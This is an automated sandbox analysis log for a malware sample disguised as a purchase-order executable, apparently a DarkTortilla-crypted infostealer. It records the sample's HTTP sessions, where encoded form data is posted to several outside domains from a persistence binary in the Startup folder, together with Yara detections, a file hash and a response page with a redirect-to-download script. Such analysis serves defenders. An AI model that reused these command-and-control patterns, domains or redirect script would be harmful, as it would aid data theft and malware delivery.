Data Ascii: xVBuxA79hJnDQ3vwl3h7GEo6rrcTScnFyX925MY09bMe2+XQG5a3LQXf3yQbv54zXhJBFW0jRo1ITA7mlIt44bqx7jmzAQBMy+jmRa0Tx08vgcqVvoyrOuE30JPwDnCf2wC54U/690DYWkJV5BKKA1vt6x0KBoVAEFJTk+azBylnckbwkPDlZiCmHKInRuQjaXImjGBY14cH9Imsw7wZJ//aQzLSeTDnLd8PG38BUCVehnLX1Qn
Nov 28, 2024 18:57:41.975275993 CET | 706 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 28 Nov 2024 17:57:41 GMT
Content-Type: text/html;charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Content-Encoding: gzip
Data Ascii: 1eaT=o0+ORVZ;r#H7"C,%?`#AC{wLrS/$18HHfK0&I9*mq}-=rHtxe|p35tk8V{VS45*M)^D d{N'WXj&7Dg`jP32)y@*mVY~\!%B{w^MEjA_A<rlqLDrT3:V)uwq{j(d$W;O(309Q4+kEf",4`JrfgrSTjgo?T~G\|W.8XtAFnx{wAn[ 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.11.20 | 49727 | 23.225.34.75 | 80 | 4568 | C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe
Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 18:57:44.510132074 CET | 392 | OUT | GET /wh2p/?VX=9+zt0j5vH1hwmuNu9M8ocWXwdarV/CDICdzwuxwNfU8HGUfYBmRRDoptJYgisjO2VNRkebPIiKpJv3rqkJwKZD01RYDx7edSJaNyhcvFUUhy7aDPpqjYjT4=&YDrhw=DvQP9LC050182Z3 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Host: www.bashei.top
Connection: close
User-Agent: Opera/9.80 (X11; Linux x86_64; U; fr) Presto/2.9 Version/11.50
Nov 28, 2024 18:57:44.673744917 CET | 1289 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 28 Nov 2024 17:57:44 GMT
Content-Type: text/html;charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Data Ascii: 5d9<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><script type="text/javascript" src="https://js.users.51.la/21851687.js"></script><script language="javascript">if(window.navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad)/i)) {setTimeout(function(){var arr=["https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a1.html","https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a2.html"];window.location.href=arr[parseInt(Math.random()*arr.length)]},0000); }else if(window.navigator.userAgent.match(/(Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i)){setTimeout(function(){var arr=["https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a1.html","https:/ [TRUNCATED]
Nov 28, 2024 18:57:44.673791885 CET | 395 | IN | Data Raw: 6e 71 78 38 31 63 38 35 67 6e 31 6f 39 75 64 2e 63 6f 6d 2f 64 6f 77 6e 6c 6f 61 64 2f 35 37 36 30 31 38 36 39 2f 35 37 36 30 31 38 36 39 61 35 2e 68 74 6d 6c 22 2c 22 68 74 74 70 73 3a 2f 2f 61 61 35 37 36 30 31 38 36 39 2e 78 6e 2d 2d 74 6e 71
Data Ascii: nqx81c85gn1o9ud.com/download/57601869/57601869a5.html","https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a6.html","https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a8.html","https://aa57601869.xn--tnqx
Nov 28, 2024 18:57:44.673827887 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                              13192.168.11.2049765172.67.149.5380
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Nov 28, 2024 19:02:10.095244884 CET399OUTGET /rfr1/?YDrhw=DvQP9LC050182Z3&VX=F4hOgqu9W5FpVGQoAREgTite/5iXCZQ+jfwfTHlgxAY2vkqeiMz3vCoerVdgDkzWxU8N3qFnpYIa4u2RgKwz4Zn2GG0gDMAqCr9egx1VT+K5Ui7eAt5njHk= HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                              Host: www.1win-moldovia.fun
                                                                                                                                              Connection: close
                                                                                                                                              User-Agent: Opera/9.80 (X11; Linux x86_64; U; fr) Presto/2.9 Version/11.50
Nov 28, 2024 19:02:13.152136087 CET | 970 | IN | HTTP/1.1 523
Date: Thu, 28 Nov 2024 18:02:13 GMT
Content-Type: text/plain; charset=UTF-8
Content-Length: 15
Connection: close
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F5uX2Kv5W%2BEmiT4K0fQMChoVwzObS2qk5m7tI27SQwmt0gf0IpCqIn8oGRYLTdoGkyXLdVioy74K%2FhhLivgwwCcJEcBpQpuV5i1JQ5aFD2VzIVuxGXsohnmrO0zcD%2By0Erul5ZiVa5Q%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 8e9c44759f0209f3-LAS
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=156948&min_rtt=156948&rtt_var=78474&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 33
Data Ascii: error code: 523


Session ID | Source IP | Source Port | Destination IP | Destination Port
14 | 192.168.11.20 | 49766 | 217.70.184.50 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 19:02:18.481478930 CET | 657 | OUT | POST /l1qb/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
Host: www.akravchenko.dev
Origin: http://www.akravchenko.dev
Referer: http://www.akravchenko.dev/l1qb/
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 199
Connection: close
User-Agent: Opera/9.80 (X11; Linux x86_64; U; fr) Presto/2.9 Version/11.50
                                                                                                                                              Data Raw: 56 58 3d 75 38 62 51 72 45 2b 6f 6e 31 4c 56 72 69 6b 47 41 31 6a 4b 4c 4b 6f 73 5a 6d 47 6e 74 4e 4c 67 66 61 62 76 53 57 31 6e 4b 64 38 58 4d 61 63 74 2f 65 35 57 6a 43 5a 2b 47 6f 58 77 66 57 53 45 2f 45 70 53 7a 78 75 6f 36 5a 6a 65 69 79 35 59 47 59 56 42 77 50 36 77 73 43 4f 47 32 73 76 30 63 52 43 66 71 4c 52 65 79 74 69 71 37 6c 6c 50 78 4b 57 65 2b 35 36 4c 48 34 65 47 4a 2b 36 79 6b 37 52 67 4e 42 76 63 58 67 59 66 67 2f 4e 74 79 74 6d 37 4a 6c 65 43 6d 56 7a 6d 48 47 45 4d 33 75 44 47 62 37 73 65 57 69 32 72 6a 79 43 32 38 6f 2f 2f 49 39 31 42 67 46 2f 6f 35 38 51 63 2b 67 3d 3d
                                                                                                                                              Data Ascii: VX=u8bQrE+on1LVrikGA1jKLKosZmGntNLgfabvSW1nKd8XMact/e5WjCZ+GoXwfWSE/EpSzxuo6Zjeiy5YGYVBwP6wsCOG2sv0cRCfqLReytiq7llPxKWe+56LH4eGJ+6yk7RgNBvcXgYfg/Ntytm7JleCmVzmHGEM3uDGb7seWi2rjyC28o//I91BgF/o58Qc+g==
Nov 28, 2024 19:02:18.785362005 CET | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
Server: nginx
Date: Thu, 28 Nov 2024 18:02:18 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
                                                                                                                                              Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                                                                                              Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
15 | 192.168.11.20 | 49767 | 217.70.184.50 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 19:02:21.309232950 CET | 677 | OUT | POST /l1qb/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
Host: www.akravchenko.dev
Origin: http://www.akravchenko.dev
Referer: http://www.akravchenko.dev/l1qb/
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 219
Connection: close
User-Agent: Opera/9.80 (X11; Linux x86_64; U; fr) Presto/2.9 Version/11.50
                                                                                                                                              Data Raw: 56 58 3d 75 38 62 51 72 45 2b 6f 6e 31 4c 56 72 48 73 47 48 57 4c 4b 4e 71 6f 76 57 47 47 6e 6d 74 4c 6b 66 61 58 76 53 56 35 33 4c 76 49 58 4d 37 41 74 2b 63 42 57 67 43 5a 2b 4f 49 58 78 41 6d 53 54 2f 45 31 67 7a 30 57 6f 36 5a 66 65 69 33 46 59 47 70 56 47 71 2f 36 79 6a 69 50 41 37 4d 76 30 63 52 43 66 71 4c 46 6b 79 73 4b 71 36 52 5a 50 77 70 4f 64 7a 5a 37 35 58 59 65 47 65 4f 36 4d 6b 37 51 46 4e 44 61 33 58 69 67 66 67 2b 39 74 6a 59 4b 34 41 6c 65 41 72 31 7a 31 4a 45 41 43 37 2b 72 35 54 62 6f 47 61 69 47 67 6d 6b 54 73 68 61 4c 62 4c 75 70 7a 6b 31 47 41 37 2b 52 48 6a 6c 66 6e 55 66 46 4e 4c 78 41 30 4a 48 6d 6d 6b 65 46 76 75 47 77 3d
                                                                                                                                              Data Ascii: VX=u8bQrE+on1LVrHsGHWLKNqovWGGnmtLkfaXvSV53LvIXM7At+cBWgCZ+OIXxAmST/E1gz0Wo6Zfei3FYGpVGq/6yjiPA7Mv0cRCfqLFkysKq6RZPwpOdzZ75XYeGeO6Mk7QFNDa3Xigfg+9tjYK4AleAr1z1JEAC7+r5TboGaiGgmkTshaLbLupzk1GA7+RHjlfnUfFNLxA0JHmmkeFvuGw=
Nov 28, 2024 19:02:21.611957073 CET | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
Server: nginx
Date: Thu, 28 Nov 2024 18:02:21 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
                                                                                                                                              Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                                                                                              Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
16 | 192.168.11.20 | 49768 | 217.70.184.50 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 19:02:24.152230024 CET | 2578 | OUT | POST /l1qb/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
Host: www.akravchenko.dev
Origin: http://www.akravchenko.dev
Referer: http://www.akravchenko.dev/l1qb/
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 7367
Connection: close
User-Agent: Opera/9.80 (X11; Linux x86_64; U; fr) Presto/2.9 Version/11.50
                                                                                                                                              Data Raw: 56 58 3d 75 38 62 51 72 45 2b 6f 6e 31 4c 56 72 48 73 47 48 57 4c 4b 4e 71 6f 76 57 47 47 6e 6d 74 4c 6b 66 61 58 76 53 56 35 33 4c 76 51 58 4c 4a 6b 74 2f 37 56 57 68 43 5a 2b 50 49 58 30 41 6d 53 53 2f 45 74 6b 7a 31 71 65 36 63 54 65 7a 68 78 59 41 62 39 47 2f 76 36 79 37 69 4f 48 32 73 76 39 63 52 79 54 71 4c 56 6b 79 73 4b 71 36 58 39 50 33 36 57 64 78 5a 36 4c 48 34 65 43 4a 2b 37 68 6b 34 67 2f 4e 44 66 4d 58 53 41 66 68 65 74 74 68 4b 53 34 50 6c 65 47 75 31 79 6f 4a 46 39 41 37 2b 6e 54 54 62 63 34 61 68 6d 67 71 56 36 56 6b 35 6e 2f 64 4f 31 4d 76 32 4f 4c 36 49 35 32 75 53 66 46 45 73 64 77 56 6c 41 78 50 6b 6d 74 6e 39 45 31 2f 54 54 70 41 4a 61 53 38 4e 37 6d 31 4e 34 6b 4e 6a 71 33 41 66 78 6a 48 35 6e 72 39 39 6c 53 75 30 64 4d 4c 61 54 78 4e 4a 46 36 4b 43 77 51 37 6b 49 31 6b 48 76 50 74 67 32 68 46 43 51 63 49 41 65 49 77 64 73 36 43 64 77 6f 55 6c 4b 31 38 6c 46 4a 59 66 31 35 77 46 4e 54 56 50 39 36 64 4c 51 62 76 37 55 51 5a 6e 2b 48 68 49 45 32 68 35 55 50 54 2f 63 69 50 71 73 [TRUNCATED]
                                                                                                                                              Data Ascii: VX=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 [TRUNCATED]
Nov 28, 2024 19:02:24.152314901 CET | 5156 | OUT | Data Raw: 4d 4b 52 4f 67 7a 59 7a 6d 52 66 4c 70 36 72 53 43 36 68 37 55 76 4a 74 48 6e 71 77 57 49 43 62 41 53 37 75 4e 2b 4e 31 4c 49 7a 30 6b 42 43 4c 51 52 47 4e 4d 36 39 51 61 46 4a 59 56 72 55 56 7a 72 38 38 44 33 71 2b 4b 62 72 7a 5a 7a 73 73 4e 4c
Data Ascii: MKROgzYzmRfLp6rSC6h7UvJtHnqwWICbAS7uN+N1LIz0kBCLQRGNM69QaFJYVrUVzr88D3q+KbrzZzssNLj0ZZQIUkpDNhStrK0Uq2OrFS9hF2R+ZFk5Vw0R+1PAYmMLcRePZ25sACdcKrHG22/6t2cfZGzVnYm+g8OYwrT0tS7KGAnBdVnm4B623RTL0v6911YpZB7aYHVDCf9sljVXrLEnXnIL5Bj48W7GtQ0ObY7XBqE7Ik6
Nov 28, 2024 19:02:24.152358055 CET | 92 | OUT | Data Raw: 30 51 31 59 6a 68 63 48 46 76 54 4b 42 2f 55 76 42 62 65 61 63 2b 4a 53 62 47 71 79 37 79 38 6b 48 4f 57 35 32 73 76 45 55 69 37 53 31 48 72 67 76 71 72 42 47 4e 64 43 37 57 35 32 33 31 4e 72 33 71 34 2f 65 32 32 72 61 6d 4e 55 74 62 53 63 51 54
Data Ascii: 0Q1YjhcHFvTKB/UvBbeac+JSbGqy7y8kHOW52svEUi7S1HrgvqrBGNdC7W5231Nr3q4/e22ramNUtbScQT4AH7wU4g==
Nov 28, 2024 19:02:24.456875086 CET | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
Server: nginx
Date: Thu, 28 Nov 2024 18:02:24 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
                                                                                                                                              Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                                                                                              Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
17 | 192.168.11.20 | 49769 | 217.70.184.50 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 19:02:26.977296114 CET | 397 | OUT | GET /l1qb/?VX=j+zwo0WruX31giYaAXLqFZsOSDWIhP7jTa/dbVxGHcBqV/4l3NxJtgpmZpbROnG1sUhGxH62sOLj7xpOC5An+cKklQHM9vXGdSm+p7Uk9aee91hqvbKIz6k=&YDrhw=DvQP9LC050182Z3 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Host: www.akravchenko.dev
Connection: close
User-Agent: Opera/9.80 (X11; Linux x86_64; U; fr) Presto/2.9 Version/11.50
Nov 28, 2024 19:02:27.284579992 CET | 1289 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 28 Nov 2024 18:02:27 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Content-Security-Policy: default-src 'self'; script-src 'nonce-8019fcae1268453bb55741248aae23f9';
Vary: Accept-Language
                                                                                                                                              Data Raw: 39 32 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 2d 73 72 63 20 27 73 65 6c 66 27 3b 20 73 63 72 69 70 74 2d 73 72 63 20 27 6e 6f 6e 63 65 2d 38 30 31 39 66 63 61 65 31 32 36 38 34 35 33 62 62 35 35 37 34 31 32 34 38 61 61 65 32 33 66 39 27 3b 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 72 [TRUNCATED]
                                                                                                                                              Data Ascii: 92e<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'nonce-8019fcae1268453bb55741248aae23f9';"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>akravchenko.dev</title> <link rel="stylesheet" type="text/css" href="main-dbee9253.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Inter/Inter-Regular--latin.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Inter/Inter-SemiBold--latin.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article class="Parking_2023-content_1rA87"><h1 class="OldStatic
Nov 28, 2024 19:02:27.284636021 CET | 1289 | IN | Data Raw: 5f 32 30 32 33 2d 74 69 74 6c 65 5f 31 33 63 65 4b 22 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 72 65 67 69 73 74 65 72 65 64 20 77 69 74 68 20 47 61 6e 64 69 2e 6e 65 74 3c 2f 68 31 3e 3c 64 69 76 20 63 6c
Data Ascii: _2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https://whois.gandi.net/en/results?search=akravchenko.dev"><strong>View the WHOIS results of
Nov 28, 2024 19:02:27.284667969 CET | 67 | IN | Data Raw: 6b 6f 2e 64 65 76 27 29 3b 0a 20 20 20 20 7d 29 3b 0a 20 20 7d 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 3c 2f 6d 61 69 6e 3e 3c 2f 64 69 76 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a
Data Ascii: ko.dev'); }); });</script></main></div> </body></html>
Nov 28, 2024 19:02:27.284699917 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 18
Source IP: 192.168.11.20
Source Port: 49770
Destination IP: 43.153.84.190
Destination Port: 80
Timestamp: Nov 28, 2024 19:02:32.475155115 CET, Bytes transferred: 660, Direction: OUT
POST /jywy/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
Host: www.hubeisuizhou.net
Origin: http://www.hubeisuizhou.net
Referer: http://www.hubeisuizhou.net/jywy/
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 199
Connection: close
User-Agent: Opera/9.80 (X11; Linux x86_64; U; fr) Presto/2.9 Version/11.50
Data Ascii: VX=TQq+VmIdEcefQBgqgqQMnzO026I33kTtWoIYVuf6tr/s2imbaZI3J+Yp9UWDEwNxUJUBuTRPffQ/BkoZ4E1J5gusfihi7JD72DUFewvC/H2H/cnMV53yqRswf5fKRWYGHbTywjBvn+dpgzW7vmJ+xG+UkmkDBTtkAZbPSlJG15VgMG60eg6Jqq+5RuR/+aM1aw==
Timestamp: Nov 28, 2024 19:02:32.648438931 CET, Bytes transferred: 289, Direction: IN
HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 28 Nov 2024 18:02:32 GMT
Content-Type: text/html
Content-Length: 146
Connection: close
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID: 19
Source IP: 192.168.11.20
Source Port: 49771
Destination IP: 43.153.84.190
Destination Port: 80
Timestamp: Nov 28, 2024 19:02:35.178930044 CET, Bytes transferred: 680, Direction: OUT
POST /jywy/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
Host: www.hubeisuizhou.net
Origin: http://www.hubeisuizhou.net
Referer: http://www.hubeisuizhou.net/jywy/
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 219
Connection: close
User-Agent: Opera/9.80 (X11; Linux x86_64; U; fr) Presto/2.9 Version/11.50
Data Ascii: VX=TQq+VmIdEcefBQQqjNkMhTO7oKI3sUTpWoEYVu3Qt5rs2A+bZco3O+Yp6kWMAwMcUJZyuStPffE/BgsZ43tOoguiSChk/JD72DUFew6X/HuH8s3MHY3x2Bs3PpfKVWYCHbTqwiMKn4Zpgym7u3J/7G+SgmlmBH0VOZTyVk1K0ptsAwruDSOtp5iLVeoX8YNuHxJVGjRzJEubergccZiza6E=
Timestamp: Nov 28, 2024 19:02:35.352215052 CET, Bytes transferred: 289, Direction: IN
HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 28 Nov 2024 18:02:35 GMT
Content-Type: text/html
Content-Length: 146
Connection: close
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Target ID: 0
Start time: 12:53:31
Start date: 28/11/2024
Path: C:\Users\user\Desktop\PO# 81136575.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\PO# 81136575.exe"
Imagebase: 0x210000
File size: 1'565'184 bytes
MD5 hash: B353674E16431A7424571790D4D58F71
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.1251917102.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.1253880543.00000000044B5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
